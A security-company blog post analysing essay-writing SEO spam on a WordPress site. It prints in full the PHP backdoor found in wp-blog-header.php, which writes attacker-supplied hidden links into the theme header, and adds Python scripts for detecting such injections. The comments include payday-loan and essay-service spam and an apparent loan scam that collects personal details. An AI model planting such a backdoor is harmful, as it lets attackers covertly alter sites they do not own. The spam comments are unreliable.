
Sucuri Blog

Not Just Pills or Payday Loans, It’s Essay SEO SPAM!

February 14, 2014, by Estevao Avillez

Remember back in school or college when you had to write pages and pages of long essays, but had no time to write them? Or maybe you were just too lazy? Yeah, good times. Well, it seems like some companies are trying to end this problem. They are offering services where clients pay to have these essays written for them.

The problem is that this is not only wrong, it is also becoming a competitive market where some companies are leveraging SEO spam to gain better rankings on search engines (e.g., Google, Bing). They are also using popular sites like bleacherreport.com and joomlacode.org to add their spam links.

Here are a couple of example URLs from sites that got hit (the URLs are still showing spam):

  • httx://bleacherreport .com/users/4065601-community-service-essays
  • httx://joomlacode .org/gf/download/trackeritem/32806/131536/online-academic-writers.html

If you think you have seen all kinds of SEO spam, think again. We just found a new one: the Essay SEO spam.

How Did We Find It?

Easy, our free malware scanner SiteCheck was flagging a website as infected.

This was the payload:

[Screenshot: SiteCheck result showing the payload]

At first, it appeared to be a false positive, but then I realized that this was an engineering website and this “paper writing services” content couldn’t possibly have anything to do with it.

After checking out some of the flagged links I got to this “final” website: httx://www.paperhelp .org/order.html. We are not implying they are behind the attacks, but it wouldn’t be a stretch of the imagination to think that they likely hired an SEO company, and that company could be using extremely blackhat techniques.

Who knows…

Where Was This Infection?

What got my attention was this tag at the beginning of the code:
"<div id="links-s" style="position:absolute; top:-4290px;">"
This is usually associated with dynamic content placed in the header of the file. So, yes, in this case it was located on this page:
"./wp-content/themes/display/header.php"
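
The off-screen positioning in that tag can be checked for mechanically. The following Python is an added example, not Sucuri's scanner code: it walks markup and reports links nested inside elements pushed far off-screen. The 1000px threshold, the sample header and the spam.example URLs are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser

# Negative pixel offset in an inline style, e.g. "top:-4290px" or "left: -9999px".
OFFSCREEN = re.compile(r"(?:top|left|text-indent)\s*:\s*-(\d+)\s*px", re.I)
MIN_OFFSET = 1000  # assumption: offsets this large are not ordinary layout tweaks
VOID = {"img", "br", "hr", "input", "meta", "link"}  # tags that never get an end tag

class HiddenLinkFinder(HTMLParser):
    """Collect <a href> targets nested inside elements pushed off-screen."""
    def __init__(self):
        super().__init__()
        self.findings = []                # one dict per off-screen container
        self._tag, self._depth = None, 0  # container tag being tracked, and its nesting

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if self._tag is None:
            m = OFFSCREEN.search(attrs.get("style") or "")
            if m and int(m.group(1)) >= MIN_OFFSET and tag not in VOID:
                self._tag, self._depth = tag, 1
                self.findings.append(
                    {"id": attrs.get("id"), "line": self.getpos()[0], "links": []})
            return
        if tag == self._tag:
            self._depth += 1
        elif tag == "a" and attrs.get("href"):
            self.findings[-1]["links"].append(attrs["href"])

    def handle_endtag(self, tag):
        if tag == self._tag:
            self._depth -= 1
            if self._depth == 0:
                self._tag = None

def find_hidden_links(markup):
    parser = HiddenLinkFinder()
    parser.feed(markup)
    parser.close()
    return [f for f in parser.findings if f["links"]]

# Constructed sample: a theme header with an injected off-screen block and a normal one.
SAMPLE_HEADER = """<html><head><?php wp_head(); ?></head>
<body class="home"> <div id="links-s" style="position:absolute; top:-4290px;"><a href="http://spam.example/essay">paper writing services</a> <a href="http://spam.example/order">essay help</a> </div>
<div id="nav" style="position:absolute; top:-4px;"><a href="/about">About</a></div>
</body></html>"""

if __name__ == "__main__":
    print(find_hidden_links(SAMPLE_HEADER))
```

Run it over theme templates or over the HTML a crawler receives; a container id that the theme's own source never defines is the detail to chase.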

How Did It Get Injected?

While cleaning the website we found a backdoor that was inserted into this file: ./wp-blog-header.php:

if (isset($_POST['link'])){
$f_p=explode("<>",$_POST['link']);
$link='';
foreach ($f_p as $f){
$f_a=explode("|",$f);
$link.='<a href="'.$f_a[0].'">'.$f_a[1].'</a>'.$f_a[2].' ';
}
$link_div='<div id="links-s" style="position:absolute; top:-4290px;">'.$link.'</div>';
$heder="wp-content/themes/display/header.php";
$p=file_get_contents($heder);
if (preg_match('|(<div id="links-s".*?</div>)|s',$p)){ $p=preg_replace('|(<div id="links-s".*?</div>)|s','',$p);}
preg_match('|(<body.*>)s|',$p,$bodys);
$body=$bodys[1]." ".$link_div;
$p_n=preg_replace('|(<body.*>)s|',"$body",$p);
$fp = fopen($heder, 'w');fwrite($fp, $p_n);fclose($fp);
echo "succes";
}

I am not a developer so I asked one of our developers (Ante Kresic) how this backdoor worked, and here is his explanation:

This backdoor was inserted in the wp-blog-header.php file, which is the first file that is read in WordPress, so this works on the whole site. The $_POST['link'] gives permission to add content in a website, in this specific case, it was added in the header.php file:

$heder="wp-content/themes/display/header.php";

So basically, the hacker is sending a payload using this post variable ‘link’, filled with ‘<>’ and ‘|’ characters written in a specific format. These are separated into multiple entries and they all show up in the header.php file, printed out as “succes”:

echo "succes";

The irony in the entire story could be traced back to a simple indicator that something was wrong. These attackers were advertising essay writing services using words like “heder” and “succes”.
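
The data flow in this backdoor, request input ending up in a file write, is something a reviewer can search PHP files for. The following Python is an added example, not Sucuri's tooling: a heuristic taint check over PHP source. The function name and the benign sample are constructed for illustration; the first sample is an excerpt of the backdoor lines shown above.

```python
import re

SOURCES = re.compile(r"\$_(?:POST|GET|REQUEST|COOKIE)\b")
SINKS = re.compile(r"\b(fwrite|fputs|file_put_contents)\s*\(([^;]*)\)")
ASSIGN = re.compile(r"(\$\w+)\s*\.?=(?![=>])\s*([^;]+);")
FOREACH = re.compile(r"foreach\s*\(\s*(\$\w+)\s+as\s+(?:\$\w+\s*=>\s*)?(\$\w+)")
VAR = re.compile(r"\$\w+")

def tainted_writes(php_source):
    """Return [(sink, tainted_vars)] for file writes fed by request input."""
    # Blank out single-quoted literals so a ';' inside them cannot split a statement.
    src = re.sub(r"'[^']*'", "''", php_source)
    tainted = set()
    def dirty(expr):
        return bool(SOURCES.search(expr)) or any(v in tainted for v in VAR.findall(expr))
    changed = True
    while changed:  # fixed point: propagate taint regardless of statement order
        changed = False
        flows = [(rhs, lhs) for lhs, rhs in ASSIGN.findall(src)] + FOREACH.findall(src)
        for origin, target in flows:
            if target not in tainted and dirty(origin):
                tainted.add(target)
                changed = True
    hits = []
    for sink, args in SINKS.findall(src):
        bad = sorted(v for v in set(VAR.findall(args)) if v in tainted)
        if bad or SOURCES.search(args):
            hits.append((sink, bad))
    return hits

# Data-flow lines excerpted from the backdoor shown above (scanner input only).
BACKDOOR_EXCERPT = r'''$f_p=explode("<>",$_POST['link']);
foreach ($f_p as $f){
$f_a=explode("|",$f);
$link.='<a href="'.$f_a[0].'">'.$f_a[1].'</a>'.$f_a[2].' ';
}
$link_div='<div id="links-s" style="position:absolute; top:-4290px;">'.$link.'</div>';
$body=$bodys[1]." ".$link_div;
$p_n=preg_replace('|(<body.*>)s|',"$body",$p);
$fp = fopen($heder, 'w');fwrite($fp, $p_n);fclose($fp);'''

# Constructed benign sample: request input is read, but the write uses other data.
BENIGN = r'''$q = $_POST['s'];
$cached = render_page($post_id);
$fp = fopen("cache/page.html", "w"); fwrite($fp, $cached); fclose($fp);'''

if __name__ == "__main__":
    print(tainted_writes(BACKDOOR_EXCERPT))
    print(tainted_writes(BENIGN))
```

A hit is a lead for manual review, not a verdict. For WordPress core files such as wp-blog-header.php, WP-CLI's `wp core verify-checksums` compares them against the official release.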


Have you run into any sites with similar scams or spam? If you’re not sure if your site, or one you’re visiting is infected, run a free malware scan. If you need help cleaning up a site, check out Sucuri cleanup services.


Categories: Joomla Security, Website Security
Tags: Malware Updates, SEO Spam

About Estevao Avillez

Estevao Avillez is Sucuri’s Senior Director of Security Research, who joined the company in 2013. Estevao’s main responsibilities include leading the Research Group, which includes the Malware, Vulnerability and WAF/Sucuri Infrastructure. His professional experience covers 15 years with planning, project and operations management. Estevao has also worked in various areas such as logistics and supply chain, media and communication, telecommunications, and trading relationships with customers. He’s worked as a consultant in financial, strategic and operational management. When Estevao isn’t keeping our customers safe, you might find him taking care of his kids and running. Connect with him on Twitter.

Comments

  1. Jim Walker

    February 15, 2014

    Nicely written Estevao Avillez. Thank you for the excellent SEO spam summary.

  2. Sunayna Gupta

    February 17, 2014

    Oh my-my these spammers always come out with something challenging to cope up with. I love this feel of winning over them.

  3. PATRICIA

    March 21, 2014

    VERY GOOD INVESTIGATION

  4. CARLOS

    March 28, 2014

    THIS IS VERY PRECISE INFORMATION TO KEEP IN MIND

  5. Maria johns

    April 9, 2014

    I am fully satisfied with your thoughts. These spammers are always doing something challenging. I loved it. And thanks for sharing this useful information with us.

  6. Warren Stephen

    July 15, 2014

    Getting an online loan was never so easy according to me. Payday loan is the best option to overcome your instant financial problem. You can get payday loan online within 24 hours @ Fast Payday Cash Advance Loans

  7. Mia Vance

    March 29, 2015

    Your essay is spot on and well thought out. I can’t imagine all the
    comments you moderate! I don’t know why people feel the need to attack
    others. Just because you don’t agree with that particular style or
    choice does not give that person the right to attack. Why can’t we
    simply just stay quiet or say–wow that’s an interesting set up / idea /
    display, etc. We have this lovely and beautiful world we live in and
    should be able to enjoy all the different parts that make it unique.
    Oy-I could go on forever….


    custom essay writing uk

  8. nabilmubarak

    July 15, 2016

    With Gain Credit Personal Loans, you can get instant loan/money for a wide range of your personal needs like renovation of your home, marriage in the family, a family holiday, your child’s education, buying a house, medical expenses or any other emergencies. With minimum documentation, you can now avail a personal loan at attractive 3% interest rates. This is trust and honest loans which you will not regret, Contact us via Email: gaincreditloan01@gmail.com

    Your Full Details:
    Full Name. . .. . .. . .. . .. . .
    Loan Amount Needed. . …
    Loan Duration. . .. . .. . .. . .
    Phone Number. . .. . .. . ..
    Applied before. . .. . .. . ..
    Country. . .. . .
    Email Us: gaincreditloan01@gmail.com

  9. Tiffany C. Mashburn

    August 12, 2017

    With essay writing service uk, you can get exactly what you want with no compromise and delay. I’m saying this because they are expert in their work and know how to write the work. They have very skilled writers which first research the topic deeply and write it.
